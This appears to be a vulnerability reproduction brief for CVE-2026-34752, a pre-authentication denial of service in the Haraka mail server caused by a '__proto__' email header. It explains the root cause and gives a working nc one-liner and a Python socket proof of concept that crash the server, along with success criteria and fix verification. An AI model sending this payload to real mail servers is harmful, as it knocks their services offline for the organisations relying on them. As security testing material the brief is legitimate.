# CVE-2026-34752

## Summary

Haraka Mail Server DoS via __proto__ prototype pollution in email headers

## Description

## OBJECTIVE: Reproduce Denial of Service via Prototype Pollution

This is NOT a crash to ignore - this is a **REMOTE PRE-AUTHENTICATION DoS** affecting a production mail server used by thousands of organizations.

## VULNERABILITY DETAILS

### Root Cause
In `node_modules/haraka-email-message/lib/header.js:215-218`, headers are stored in a plain `{}` object:

```javascript
_add_header(key, value, method) {
    this.headers[key] ??= []          // line 216
    this.headers[key][method](value)  // line 217
}
```

When `key` is `__proto__`:
1. `this.headers['__proto__']` returns `Object.prototype`
2. `Object.prototype` is not null/undefined, so `??=` is skipped
3. `Object.prototype.push(value)` throws `TypeError: not a function`
4. Uncaught exception triggers `process.exit(1)` in `haraka.js:26-33`

### Impact
- **Single-process mode**: Entire server crashes and STAYS DOWN
- **Cluster mode**: Worker dies, sessions lost, availability disrupted
- **CVSS 4.0**: 8.7/10 (High severity)

## REPRODUCTION STEPS

```bash
# 1. Install vulnerable version
npm install -g Haraka@3.1.3

# 2. Initialize config
haraka -i /tmp/haraka_test
cd /tmp/haraka_test

# 3. Start server (default port 2525)
haraka -c .

# 4. Send malicious email (in another terminal)
(echo "EHLO attacker"; 
 echo "MAIL FROM:<attacker@evil.com>"; 
 echo "RCPT TO:<victim@localhost>"; 
 echo "DATA"; 
 echo "From: attacker@evil.com"; 
 echo "__proto__: crash"; 
 echo ""; 
 echo "Crash payload"; 
 echo "."; 
 echo "QUIT") | nc localhost 2525

# 5. EXPECTED RESULT: Haraka worker process crashes, process exits with code 1
```

## Python PoC (Official from Advisory)
```python
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 2525))
sock.recv(4096)  # Banner
sock.sendall(b"EHLO evil\r\n"); sock.recv(4096)
sock.sendall(b"MAIL FROM:<x@x.com>\r\n"); sock.recv(4096)
sock.sendall(b"RCPT TO:<user@haraka.local>\r\n"); sock.recv(4096)
sock.sendall(b"DATA\r\n"); sock.recv(4096)
sock.sendall(b"From: x@x.com\r\n__proto__: crash\r\n\r\nbody\r\n.\r\n")
# Server crashes here
```

## SUCCESS CRITERIA
- [ ] Server accepts SMTP connections initially
- [ ] Server processes normal email without issues
- [ ] Sending `__proto__:` header causes immediate crash
- [ ] Process exits with code 1 (visible in logs/terminal)
- [ ] Server becomes unavailable (DoS achieved)

## FIX VERIFICATION (Version 3.1.4+)
After upgrading to 3.1.4, the same payload should be handled gracefully without crash.

## REFERENCES
- GitHub Advisory: https://github.com/haraka/Haraka/security/advisories/GHSA-xph3-r2jf-4vp3
- Fix Release: https://github.com/haraka/Haraka/releases/tag/v3.1.4
- CVE: https://www.cve.org/CVERecord?id=CVE-2026-34752

## Metadata

- Product: Haraka Mail Server
- Severity: high
- Status: open